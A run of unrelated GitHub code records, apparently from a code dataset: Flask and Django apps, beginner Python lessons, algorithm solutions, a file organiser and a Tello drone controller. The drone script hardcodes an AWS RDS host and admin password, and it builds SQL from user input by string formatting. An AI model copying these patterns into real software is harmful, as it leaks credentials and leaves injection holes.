Return the average of this list\n for i in range(1000):\n data = stream.read(CHUNK, exception_on_overflow=False)\n rms = audioop.rms(data,2)\n audioLst.append((20*np.log(rms)))\n found = sum(audioLst)/len(audioLst)\n return found\n","repo_name":"Joostluijben/IDP_Feedbacklamp","sub_path":"client/hey.py","file_name":"hey.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28174994083","text":"\"\"\"Application setup\n 1) Swagger UI\n 2) API routes\n\"\"\"\nimport configs\n\nfrom flask import Flask, jsonify, request\nfrom oto import response\nfrom oto.adaptors.flask import flaskify\nfrom flasgger import Swagger\nfrom src import constants, validator\nfrom src.logic import logic\nfrom flask_cors import CORS\n\n\n# Application instance\napp = Flask(configs.API_NAME)\nCORS(app)\n\n# Swagger UI integration\napp.config['SWAGGER'] = {\n 'title': 'Flask Api - CRUD',\n 'uiversion': 2\n}\nSwagger(app, template_file=configs.SWAGGER_SPEC_PATH)\n\n\n@app.errorhandler(500)\ndef internal_error(error):\n return response.create_fatal_response(\n constants.ERROR_MESSAGE_INTERNAL_ERROR)\n\n\n@app.route(configs.BASE_PATH + '/hello', methods=['GET'])\n@validator.authorization(request)\ndef health():\n \"\"\"Check the health of the application.\n :return: Status of application.\n \"\"\"\n return jsonify({'status': 'ok'})\n\n\n@app.route(\n configs.BASE_PATH + '/department/', methods=['GET'])\n@validator.authorization(request)\ndef get_department(department_id):\n \"\"\"Get the department details against the given department id.\n :param department_id: str - Unique identification of department.\n :return: Department details against the given department id.\n \"\"\"\n return flaskify(logic.get_department(department_id))\n\n\n@app.route(\n configs.BASE_PATH + '/employee/', methods=['GET'])\n@validator.authorization(request)\ndef get_employee(employee_id):\n \"\"\"Get the employee details against the given employee id.\n :param employee_id: str - Unique identification of department.\n :return: Employee details against the given employee id.\n \"\"\"\n return flaskify(logic.get_employee(employee_id))\n\n\n@app.route(\n configs.BASE_PATH + '/department/', methods=['DELETE'])\n@validator.authorization(request)\ndef delete_department(department_id):\n \"\"\"Delete the department details against the given department id.\n :param department_id: str - Unique identification of department.\n :return: Success message on delete department details.\n \"\"\"\n return flaskify(logic.delete_department(department_id))\n\n\n@app.route(\n configs.BASE_PATH + '/employee/', methods=['DELETE'])\n@validator.authorization(request)\ndef delete_employee(employee_id):\n \"\"\"Delete the employee details against the given employee id.\n :param employee_id: str - Unique identification of employee.\n :return: Success message on delete employee details.\n \"\"\"\n return flaskify(logic.delete_employee(employee_id))\n\n\n@app.route(\n configs.BASE_PATH + '/department', methods=['POST'])\n@validator.authorization(request)\ndef post_department():\n \"\"\"Add the department details.\n :param: request json - Request body.\n :return: Department details added against the given data.\n \"\"\"\n return flaskify(logic.post_department(request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/employee', methods=['POST'])\n@validator.authorization(request)\ndef post_employee():\n \"\"\"Add an employee details.\n :param: request json - Request body.\n 
:return: Employee details added against the given data.\n \"\"\"\n return flaskify(logic.post_employee(request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/department/', methods=['PUT'])\n@validator.authorization(request)\ndef put_department(department_id):\n \"\"\"Update the department details against the given department id.\n :param department_id: str - Unique identification of department.\n :return: Success message on update of department details.\n \"\"\"\n return flaskify(logic.put_department(department_id, request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/employee/', methods=['PUT'])\n@validator.authorization(request)\ndef put_employee(employee_id):\n \"\"\"Update the employee details against the given employee id.\n :param employee_id: str - Unique identification of employee.\n :return: Success message on update of employee details.\n \"\"\"\n return flaskify(logic.put_employee(employee_id, request.get_json()))\n\n\n@app.route(\n configs.BASE_PATH + '/department', methods=['GET'])\n@validator.authorization(request)\ndef get_departments():\n \"\"\"Get the departments detail.\n :return: Departments detail.\n \"\"\"\n filter_data = {\n 'page': request.args.get('page') or 1,\n 'page_size':\n request.args.get('page_size') or constants.DEFAULT_PAGE_SIZE,\n 'sort_by': request.args.get('sort_by') or None,\n 'order_by': request.args.get('order_by') or None,\n 'search_by': request.args.get('search_by') or None,\n 'search_for': request.args.get('search_for') or None\n }\n return flaskify(logic.get_departments(filter_data))\n\n\n@app.route(\n configs.BASE_PATH + '/employee', methods=['GET'])\n@validator.authorization(request)\ndef get_employees():\n \"\"\"Get the employees detail.\n :return: Employees detail.\n \"\"\"\n filter_data = {\n 'page': request.args.get('page') or 1,\n 'page_size':\n request.args.get('page_size') or constants.DEFAULT_PAGE_SIZE,\n 'sort_by': request.args.get('sort_by') or None,\n 'order_by': request.args.get('order_by') or None,\n 'search_by': request.args.get('search_by') or None,\n 'search_for': request.args.get('search_for') or None\n }\n return flaskify(logic.get_employees(filter_data))\n","repo_name":"omkar-hardwell/flask-crud-api","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"28688759938","text":"# 변수 : 값을 저장하는 공간\n# 주석 : 코드 내에 포함 되어 있지만 실제로 실행 되지 않음\n# ex. 반려 동물을 소개해 주세요\nanimal = \"고양이\"\nname = \"해피\"\nage = 4\nhobby = \"낮잠\"\nis_adult = age >= 3\n\n# 여러 문장을 주석 처리하고자 할 경우\n'''\n작은 따옴표 3개를 입력 하면 여러 문장을 한 번에 주석 처리\n'''\n\n# 여러 줄의 코드 한꺼번에 주석 처리/해제할 때 단축키 : 코드들 드래그 후 Ctrl + /\nprint(\"우리집 \" + animal + \"의 이름은 \" + name + \"예요\")\n# 동일한 이름의 변수가 아랫쪽에 있는 경우, 아랫쪽에 입력된 값이 반영됨\nhobby = \"공놀이\"\nprint(name + \"는 \" + str(age) + \"살이며, \" + hobby + \"을 아주 좋아해요\")\n# int, boolean 형은 str()로 감싸줘야 출력 가능\n# 문자열과 변수 사이 , 사용하면 자동적으로 1칸씩 띄워줌\nprint(name, \"는 \", str(age), \"살이며, \", hobby, \"을 아주 좋아해요\")\nprint(name + \"는 어른일까요? \" + str(is_adult))\n\n\n","repo_name":"gPdbs2/TIL","sub_path":"나도코딩 Python 기본/1. 자료형/4,5. 변수, 주석.py","file_name":"4,5. 변수, 주석.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"70694160161","text":"from django.urls import path \nfrom . 
import views\n\nurlpatterns = [\n path('login/',views.LoginInterfaceView.as_view(),name='login'),\n path('register/',views.SignupView.as_view(),name='register'),\n path('logout/', views.logoutUser, name='logout'),\n\n\n path('', views.home, name='home'),\n path('cart/', views.cart, name='cart'),\n path('checkout/', views.checkout, name='checkout'),\n path('update_item/', views.updateItem, name='update_item'),\n]","repo_name":"bonface221/E-commerce","sub_path":"base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25377590454","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nn,m = map(int, input().split())\r\n\r\ncost = []\r\nfor _ in range(m):\r\n [a, b] = map(int, input().split())\r\n cost.append([a,b])\r\n\r\nsix_list = sorted(cost, key=lambda x: x[0])\r\none_list = sorted(cost, key=lambda x: x[1])\r\n\r\nresult = 0\r\nif six_list[0][0] <= one_list[0][1] * 6:\r\n result = six_list[0][0] * (n // 6) + (n % 6) * one_list[0][1]\r\n if (n % 6) * one_list[0][1] > six_list[0][0]:\r\n result = six_list[0][0] * ((n // 6)+1)\r\nelse:\r\n result = one_list[0][1] * n\r\n\r\nprint(result)\r\n\r\n# 다른 방법\r\nimport sys\r\ninput = sys.stdin.readline\r\n\r\nn,m = map(int, input().split())\r\n\r\nsix_list = []\r\none_list = []\r\nfor _ in range(m):\r\n [a, b] = map(int, input().split())\r\n six_list.append(int(a))\r\n one_list.append(int(b))\r\n\r\nsix = min(six_list)\r\none = min(one_list)\r\n\r\n# 이하 동문\r\n","repo_name":"noxknow/Python-Coding_test","sub_path":"02. 그리디 알고리즘/1049 기타줄.py","file_name":"1049 기타줄.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"6873941253","text":"import sys\n\n# 예외 처리 방법\nwhile True:\n try:\n n = list(map(int, input().split()))\n print(sum(n))\n except:\n break\n\n# readlines() 사용\nlines = sys.stdin.readlines()\nfor line in lines:\n num = list(map(int,line.split()))\n print(sum(num))","repo_name":"saevyeokvyeol/python_algorithm_study","sub_path":"yuda/Iteration/0704_10951.py","file_name":"0704_10951.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24610502109","text":"import re\nfrom django.core import validators\nfrom django.utils.translation import ugettext_lazy as _\nfrom horizon import exceptions, forms, messages\nfrom horizon.utils import fields\nfrom cnext_api import api\nfrom cnext.resource import provider_keypairs_choices,region_keypairs_choices\nfrom mongoengine.django.mongo_auth.models import get_user_document\n\nNEW_LINES = re.compile(r\"\\r|\\n\")\n\nclass Regionlist():\n def __init__(self, provider, region):\n self.name = region\n self.provider = provider\n self.region = region\n\n\nclass CreateKeypair(forms.SelfHandlingForm):\n\n name = forms.CharField(max_length=\"20\",\n label=_(\"Keypair Name\"),\n validators=[validators.validate_slug],\n error_messages={'invalid': _('Keypair names may '\n 'only contain letters, numbers, underscores '\n 'and hyphens.')})\n key_provider_list = forms.ChoiceField(\n label=_(\"Providers List\"),\n required=True,\n )\n key_region_list = forms.ChoiceField(\n label=_(\"Regions List\"),\n required=True,\n widget=fields.SelectWidget(data_attrs=('provider', 'region', ),\n transform=lambda x: (\"%s \" % (x.name)))\n )\n\n def handle(self, request, data):\n return True # We just redirect to 
the download view.\n def __init__(self, request, *args, **kwargs):\n forms.SelfHandlingForm.__init__(self, request, *args, **kwargs)\n provider_list = api.providers(self.request)\n region_list = api.region(self.request)\n p = [(\"\", _(\"Select Provider\"))]\n for provider in provider_list:\n if provider.provider in provider_keypairs_choices:\n p.append((provider.provider.lower(),provider.provider))\n t = tuple(p)\n tuple_providers = t\n self.fields['key_provider_list'].choices = tuple_providers\n r = [(\"\", _(\"Select Region\"))]\n for region in region_list:\n if region.name in region_keypairs_choices:\n r.append((region.name,Regionlist(region.provider,region.name)))\n r = tuple(r)\n tuple_regions = r\n self.fields['key_region_list'].choices = tuple_regions\n\n\nclass ImportKeypair(forms.SelfHandlingForm):\n name = forms.CharField(max_length=\"20\", label=_(\"Keypair Name\"),\n validators=[validators.RegexValidator('\\w+')])\n public_key = forms.CharField(label=_(\"Public Key\"), widget=forms.Textarea)\n\n def handle(self, request, data):\n try:\n # Remove any new lines in the public key\n data['public_key'] = NEW_LINES.sub(\"\", data['public_key'])\n keypair = api.keypairs(request)\n messages.success(request, _('Successfully imported public key: %s')\n % data['name'])\n return keypair\n except Exception:\n exceptions.handle(request, ignore=True)\n self.api_error(_('Unable to import keypair.'))\n return False\n\nclass AccountChangeForm(forms.SelfHandlingForm):\n accounts_list=[]\n def __init__(self, *args, **kwargs):\n accounts_list = kwargs[\"initial\"][\"account_choices\"]\n super(AccountChangeForm, self).__init__(*args,**kwargs) \n self.fields['account_name'] = forms.ChoiceField(label=\"Account Name\", choices=accounts_list)\n \n account_name = forms.ChoiceField(label=_(\"Account Name\"),\n required=True,\n choices = accounts_list,\n help_text=_(\"Select your account\"))\n \n def handle(self, request, data):\n user = get_user_document().objects(username=request.user.username).first()\n cnext_clouds = sum([[y.cloudid for y in i.policy if \n y.cloudid.platform == \"Cnext\"] for i in request.user.roles], [])\n for cloud in cnext_clouds:\n if str(cloud.id) == str(data['account_name']):\n user.cnextpublickey = cloud[\"cloud_meta\"][\"publickey\"]\n user.cnextprivatekey = cloud[\"cloud_meta\"][\"privatekey\"]\n user.cnextendpoint = cloud[\"cloud_meta\"][\"endpoint\"]\n user.cnextname = cloud[\"name\"]\n user.save()\n return True\n return False\n","repo_name":"CloudenablersPvtLtd/HybridHorizon","sub_path":"cnext/keypairs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14356332402","text":"class Person:\n def __init__(self, n=\"Name\", s=\"Surname\"):\n self.name = n\n self.surname = s\n\np1 = Person(\"Bill\",\"Ross\")\nprint(p1.name, p1.surname)\np2 = Person(\"123\", \"321\")\nprint(p2.name, p2.surname)\np3 = Person()\nprint(p3.name, p3.surname)","repo_name":"ogogost/sandbox","sub_path":"class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"766906942","text":"from sklearn.metrics import confusion_matrix\nimport pandas as pd \nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ndef plot_confusion(ys, y_hts):\n '''\n function which returns figure of confusion matrix\n '''\n confusion_array = confusion_matrix(ys, y_hts)\n 
df_cm = pd.DataFrame(confusion_array, index = ['Negative', 'Postive'],\n columns = ['Negative', 'Positive'])\n fig, ax = plt.subplots(figsize = (10,7))\n ax = sns.heatmap(df_cm, annot=True)\n ax.set_xlabel('Predictions')\n ax.set_ylabel('Actual')\n return fig\n\n\nif __name__ == '__main__':\n ys = [1,0,1]\n yhts = [1,0,1]\n\n fig = plot_confusion(ys, yhts)\n fig.savefig('experiment.png')\n","repo_name":"harrygcoppock/covid_cross_datasets","sub_path":"utils/confusion_matrix.py","file_name":"confusion_matrix.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"19668684146","text":"import os.path\nimport shutil\nfrom random import randint\nfrom os import listdir, rename\nfrom os.path import isfile, join\nfrom extensions import FILE_EXTENSIONS\n\n\nclass FileManager:\n\n def __init__(self, dir_roots: list, target_root: str, logger):\n self.dir_roots = dir_roots\n self.target_root = target_root\n self.logg = logger\n\n @staticmethod\n def get_all_files(root_dir: str):\n only_files = [f for f in listdir(root_dir) if isfile(join(root_dir, f)) and not f.startswith('.') and not f.startswith('~')]\n return only_files\n\n def get_file_extension(self, filename: str):\n index = [i for i, c in enumerate(filename) if c == '.'][-1]\n return filename[index + 1:]\n\n def cleaner(self, files: list, source_root: str):\n for filename in files:\n ext_of_file = self.get_file_extension(filename)\n\n if ext_of_file in FILE_EXTENSIONS['pdf']:\n self.move_file_to_folder(source_root, filename, 'PDF')\n\n elif ext_of_file in FILE_EXTENSIONS['image']:\n self.move_file_to_folder(source_root, filename, 'Image')\n\n elif ext_of_file in FILE_EXTENSIONS['music']:\n self.move_file_to_folder(source_root, filename, 'Music')\n\n elif ext_of_file in FILE_EXTENSIONS['video']:\n self.move_file_to_folder(source_root, filename, 'Video')\n\n elif ext_of_file in FILE_EXTENSIONS['shell']:\n self.move_file_to_folder(source_root, filename, 'Shell')\n\n elif ext_of_file in FILE_EXTENSIONS['word']:\n self.move_file_to_folder(source_root, filename, 'Word')\n\n def move_file_to_folder(self, source_root: str, filename: str, foldername: str):\n \"\"\"\n Check if target folder already exists. If not, create it.\n Check if file already exists in target folder, if not move the file to the folder,\n if it exists, rename the source file and move to target folder.\n \"\"\"\n\n self.create_dir_if_not_exist(foldername)\n\n if not self.check_if_filename_exists(filename, join(self.target_root, foldername)):\n shutil.move(join(source_root, filename), join(self.target_root, foldername))\n self.logg.info(f\"{foldername} file moved\")\n else:\n self.logg.info(f\"{filename} already exists in {foldername} folder\")\n filename = self.rename_file(filename, source_root)\n self.logg.info(f\"Renamed to {filename} and moved to {foldername} folder\")\n\n @staticmethod\n def rename_file(filename: str, source_root: str):\n name, extension = filename.split(\".\")\n new_filename = name + '_.' 
+ extension\n rename(join(source_root, filename), join(source_root, new_filename))\n\n return new_filename\n\n def create_dir_if_not_exist(self, folder_name):\n if not os.path.exists(join(self.target_root, folder_name)):\n self.logg.info(f\"{folder_name} folder created\")\n os.makedirs(join(self.target_root, folder_name))\n\n def check_if_filename_exists(self, filename: str, folder_path: str):\n if filename in self.get_all_files(folder_path):\n return True\n\n return False\n\n def run(self):\n for dir_root in self.dir_roots:\n files = self.get_all_files(dir_root)\n\n if files:\n self.cleaner(files, dir_root)","repo_name":"alangraf/file_manager","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73366035680","text":"import os\nimport boto3\nimport pygame\nimport pymysql\nfrom djitellopy import Tello\nfrom datetime import datetime\nfrom random import *\nfrom dotenv import find_dotenv, load_dotenv\nfrom db.dynamo_db import DroneDb\n\n# input fields status color\nname_color = None\nemail_color = None\ndepartment_color = None\n\n# user input Fields\nuser_email = pygame.Rect\nuser_name = pygame.Rect\nuser_department = pygame.Rect\nsubmit_button = pygame.Rect\n\n# checker if user has submitted information\nuser_info = False\n\n# controller values to move drone\ncontroller = None\nup_down = 0\nleft_right = 0\nforward_backward = 0\nyaw = 0\n\n# finding environment variable\ndotenv_path = find_dotenv()\nload_dotenv(dotenv_path)\n\n# dynamodb references\nclient = boto3.client(\n 'dynamodb',\n aws_access_key_id=os.getenv('DB_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('DB_SECRET_ACCESS_KEY_ID'),\n region_name='us-east-1'\n)\n\ndynamodb = boto3.resource(\n 'dynamodb',\n aws_access_key_id=os.getenv('DB_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('DB_SECRET_ACCESS_KEY_ID'),\n region_name='us-east-1'\n)\n\nddb_exceptions = client.exceptions\n\n\n# This is a class we are going to use to print the user prompts\nclass UserInputPrint(object):\n def __init__(self):\n self.line_height = None\n self.y = None\n self.x = None\n self.reset()\n self.font = pygame.font.Font(None, 20)\n\n def print_prompt(self, view, prompt):\n text = self.font.render(prompt, True, WHITE)\n view.blit(text, (self.x, self.y))\n self.y += self.line_height\n\n def reset(self):\n self.x = 10\n self.y = 10\n self.line_height = 20\n\n\n# We are going to use this class to render input fields in the screen\nclass Input(UserInputPrint):\n def __init__(self):\n super().__init__()\n self.border = 2\n self.name_active = False\n self.email_active = False\n self.department_active = False\n self.name_input = ''\n self.email_input = ''\n self.department_input = ''\n self.flight_id = None\n self.flight_time = None\n\n # Render user input coming from keyboard\n\n def render_input(self, view, rectangle, color, text):\n self.x += 10\n self.y += 10\n pygame.draw.rect(view, color, rectangle, self.border)\n text_surface = user.font.render(text, True, WHITE)\n screen.blit(text_surface, (rectangle.x + 5, rectangle.y + 5))\n self.x -= 10\n self.y += 50\n\n # Render the button to submit the information\n\n def render_button(self, view, rectangle, color, text):\n self.x += 50\n self.y += 10\n pygame.draw.rect(view, color, rectangle)\n text_surface = user.font.render(text, True, BLACK)\n screen.blit(text_surface, (rectangle.x + 5, rectangle.y + 5))\n\n\n# class for XBOX controller button mapping\nclass 
XboxController:\n # Buttons\n TAKEOFF = 5\n LAND = 4\n\n # Joysticks\n LEFT_Y = 1 # forward -1 backwards 1\n LEFT_X = 0 # Left -1 Right 1\n RIGHT_Y = 3 # up -1 down 1\n RIGHT_X = 2 # Rotate left -1 Rotate right 1\n\n LEFT = -1\n UP = -1\n ROTATE_LEFT = -1\n FORWARD = -1\n\n # Joystick still have input if not moved\n DEAD_ZONE = 0.06\n\n # Controller is output is inverted by default\n INVERTED = -1\n\n\n# Define some colors.\nBLACK = pygame.Color('black')\nWHITE = pygame.Color('white')\n\n\n# This is a simple class that will help us print to the view.\nclass DroneInfoPrint(object):\n def __init__(self):\n self.line_height = None\n self.y = None\n self.x = None\n self.reset()\n self.font = pygame.font.Font(None, 20)\n\n def tprint(self, view, text_string):\n text_bitmap = self.font.render(text_string, True, BLACK)\n view.blit(text_bitmap, (self.x, self.y))\n self.y += self.line_height\n\n def reset(self):\n self.x = 10\n self.y = 10\n self.line_height = 15\n\n def indent(self):\n self.x += 10\n\n def unindent(self):\n self.x -= 10\n\n\n# This displays what the controller is making the drone do along with some extra data that the drone is sending back\ndef display_controller_input():\n # Get the name from the OS for the controller/joystick.\n global controller\n global up_down\n global left_right\n global forward_backward\n global yaw\n\n name = joystick.get_name() # get the name of the controller\n droneInfoPrint.tprint(screen, \"Joystick name: {}\".format(name))\n\n # If name of controller matches the string use xbox button mapping class\n if name == 'Controller (Xbox One For Windows)':\n controller = XboxController\n\n try:\n guid = joystick.get_guid()\n except AttributeError:\n # get_guid() is an SDL2 method\n pass\n else:\n droneInfoPrint.tprint(screen, \"GUID: {}\".format(guid))\n\n # printing drone liver status attributes into the screen\n battery = tello.get_battery()\n flight_time = tello.get_flight_time()\n temperature = tello.get_temperature()\n altitude = tello.get_height()\n droneInfoPrint.tprint(screen, \"Drone Info:\")\n droneInfoPrint.indent()\n droneInfoPrint.tprint(screen, \"Battery ----> {}\".format(battery))\n droneInfoPrint.tprint(screen, \"Flight Time ----> {}s\".format(flight_time))\n droneInfoPrint.tprint(screen, \"Temperature ----> {}\".format(temperature))\n droneInfoPrint.tprint(screen, \"Altitude ----> {}\".format(altitude))\n droneInfoPrint.unindent()\n\n # Usually axis run in pairs, up/down for one, and left/right for\n # the other.\n axes = joystick.get_numaxes()\n droneInfoPrint.tprint(screen, \"Drone Movement:\")\n droneInfoPrint.indent()\n\n # Printing the drone movement along with giving commands to drone using joysticks\n for num in range(axes):\n axis = joystick.get_axis(num)\n if num == controller.LEFT_X:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Left: {:.0f}\".format(axis * 100))\n\n left_right = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Right: {:.0f}\".format(axis * 100))\n\n left_right = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif num == controller.LEFT_Y:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Forward: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n forward_backward = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + 
controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Backwards: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n forward_backward = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif num == controller.RIGHT_X:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Yaw: {:.0f}\".format(axis * 100))\n\n yaw = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Yaw: {:.0f}\".format(axis * 100))\n\n yaw = int(axis * 100)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif num == controller.RIGHT_Y:\n if axis < (0 - controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Up: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n up_down = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n elif axis > (0 + controller.DEAD_ZONE):\n droneInfoPrint.tprint(screen, \"Down: {:.0f}\".format((axis * 100) * controller.INVERTED))\n\n up_down = int((axis * 100) * controller.INVERTED)\n\n tello.send_rc_control(left_right, forward_backward, up_down, yaw)\n droneInfoPrint.unindent()\n\n # Getting the buttons reference from the controller\n buttons = joystick.get_numbuttons()\n droneInfoPrint.tprint(screen, \"Drone Status:\")\n droneInfoPrint.indent()\n\n # listening for any take off or land commands from the controller using the bumpers\n for input_ in range(buttons):\n button = joystick.get_button(input_)\n if input_ == controller.TAKEOFF:\n if button == 1:\n droneInfoPrint.tprint(screen, \"Taking Off....\")\n tello.takeoff()\n if input_ == controller.LAND:\n if button == 1:\n response = tello.send_command_with_return('land', timeout=7)\n droneInfoPrint.tprint(screen, \"Landing......\")\n\n if 'ok' in response.lower():\n table.insert_item(user.flight_id, flight_time, user.name_input, user.email_input,\n user.department_input)\n sql = '''insert into pilot_flights (flight_id, pilot_name, email_address, department, \n flight_time) values ('%s', '%s', '%s', '%s', %s)''' % (user.flight_id, user.name_input,\n user.email_input,\n user.department_input, flight_time)\n print(sql)\n cursor.execute(sql)\n rds.commit()\n\n droneInfoPrint.unindent()\n\n\n# Activating input fields if user clicks into one and blocking the fields if user clicks on somthing else, also it will\n# store whatever the user typed into variables\ndef user_input():\n # colors for textBoxes to display between active or inactive\n color_active = pygame.Color('lightskyblue3')\n color_passive = pygame.Color('gray15')\n\n global name_color\n global email_color\n global department_color\n global user_info\n\n # setting color values depending on if they are active or not\n if user.department_active:\n department_color = color_active\n else:\n department_color = color_passive\n\n if user.name_active:\n name_color = color_active\n else:\n name_color = color_passive\n\n if user.email_active:\n email_color = color_active\n else:\n email_color = color_passive\n\n # activating or deactivating input fields when clicked\n if event.type == pygame.MOUSEBUTTONDOWN:\n if user_name.collidepoint(event.pos):\n user.name_active = True\n else:\n user.name_active = False\n\n if user_email.collidepoint(event.pos):\n user.email_active = True\n else:\n user.email_active = False\n\n if user_department.collidepoint(event.pos):\n user.department_active = True\n else:\n 
user.department_active = False\n\n if submit_button.collidepoint(event.pos):\n user.flight_id = generate_flight_id()\n user_info = True\n print(\"name: {} Email: {} Department: {} Flight_ID: {}\".format(user.name_input, user.email_input,\n user.department_input, user.flight_id))\n\n # Storing user information in variables\n if event.type == pygame.KEYDOWN:\n if user.name_active:\n if event.key == pygame.K_BACKSPACE:\n user.name_input = user.name_input[:-1]\n else:\n user.name_input += event.unicode\n\n if user.email_active:\n if event.key == pygame.K_BACKSPACE:\n user.email_input = user.email_input[:-1]\n else:\n user.email_input += event.unicode\n\n if user.department_active:\n if event.key == pygame.K_BACKSPACE:\n user.department_input = user.department_input[:-1]\n else:\n user.department_input += event.unicode\n\n\n# Rendering the hole user input interface\ndef render_userinput():\n global user_email\n global user_name\n global user_department\n global submit_button\n\n # Rendering Prompts to user\n user.print_prompt(screen, \"Name:\")\n user_name = pygame.Rect(user.x, user.y, 240, 32)\n user.render_input(screen, user_name, name_color, user.name_input)\n\n user.print_prompt(screen, \"Email\")\n user_email = pygame.Rect(user.x, user.y, 240, 32)\n user.render_input(screen, user_email, email_color, user.email_input)\n\n user.print_prompt(screen, \"Department\")\n user_department = pygame.Rect(user.x, user.y, 240, 32)\n user.render_input(screen, user_department, department_color, user.department_input)\n\n submit_button = pygame.Rect(user.x, user.y, 100, 22)\n user.render_button(screen, submit_button, pygame.Color('white'), 'Submit')\n\n\n# generating a flight id\ndef generate_flight_id():\n flight_id = datetime.today().strftime('%Y-%m-%d')\n flight_id += \".\"\n flight_id += str(randint(0, 1000))\n\n return flight_id\n\n\n# initializing pygame\npygame.init()\n\n# Set the width and height of the view (width, height).\nscreen = pygame.display.set_mode((1000, 1000))\n\npygame.display.set_caption(\"Drone_View\")\n\n# Loop until the user clicks the close button.\ndone = False\n\n# Keep view black with user input until user is done submitting information\nuser = Input()\n\n# Used to manage how fast the view updates.\nclock = pygame.time.Clock()\n\n# Initialize the joysticks.\npygame.joystick.init()\n\n# Get ready to print.\ndroneInfoPrint = DroneInfoPrint()\n\n# tello drone object\ntello = Tello()\n\n# connect to tello\ntello.connect()\n\n# dynamodb table object\ntable = DroneDb(dynamodb)\n\n# connection instance of rds\nrds = pymysql.connect(host='drone-flights-data.cahojfeljvlq.us-east-1.rds.amazonaws.com',\n user='admin',\n password='admin123')\n# used to execute commands to rds\ncursor = rds.cursor()\n\n# using database\nusing_sql = '''use drone_flights'''\ncursor.execute(using_sql)\n\n# -------- Main Program Loop -----------\nwhile not done:\n\n for event in pygame.event.get(): # User did something.\n if event.type == pygame.QUIT: # If user clicked close.\n done = True\n user_input()\n\n # First, clear the view to white. 
Don't put other drawing commands\n # above this, or they will be erased with this command.\n if not user_info:\n screen.fill(BLACK)\n user.reset()\n render_userinput()\n else:\n screen.fill(WHITE)\n droneInfoPrint.reset()\n\n # Get count of joysticks.\n joystick_count = pygame.joystick.get_count()\n\n # For each joystick:\n for i in range(joystick_count):\n joystick = pygame.joystick.Joystick(i)\n joystick.init()\n\n display_controller_input()\n\n pygame.display.flip()\n\n # Limit to 20 frames per second.\n clock.tick(60)\n\npygame.quit()\n","repo_name":"JeanCarlosVal/Tello_Drone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72944759522","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport json\n#import matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nfrom PIL import Image\nimport math\nfrom decimal import Decimal, ROUND_HALF_UP\n\ndef gradient(k):\n image = cv2.imread(\"S.JPG\")\n image = cv2.blur(image,(2*k+1, 2*k+1))\n cv2.imwrite('S_.JPG', image)\n height, width = image.shape[:2]\n\n image = Image.open(\"S_.JPG\")\n image_data = image.getdata()\n g = [[[0] * 2 for i in range(height)] for j in range(width)]\n for x in range(k, width - k):\n print(x)\n for y in range(k, height - k):\n g_vector = 0.0\n for w in range(8):\n p = math.cos(math.radians(22.5 * w)) * k\n q = math.sin(math.radians(22.5 * w)) * k\n\n p = Decimal(str(p))\n q = Decimal(str(q))\n\n int_p = int(p.quantize(Decimal('0'), rounding=ROUND_HALF_UP))\n int_q = int(q.quantize(Decimal('0'), rounding=ROUND_HALF_UP))\n\n g_p = np.array(p, dtype='u8')\n g_q = np.array(q, dtype='u8')\n\n g_vector = 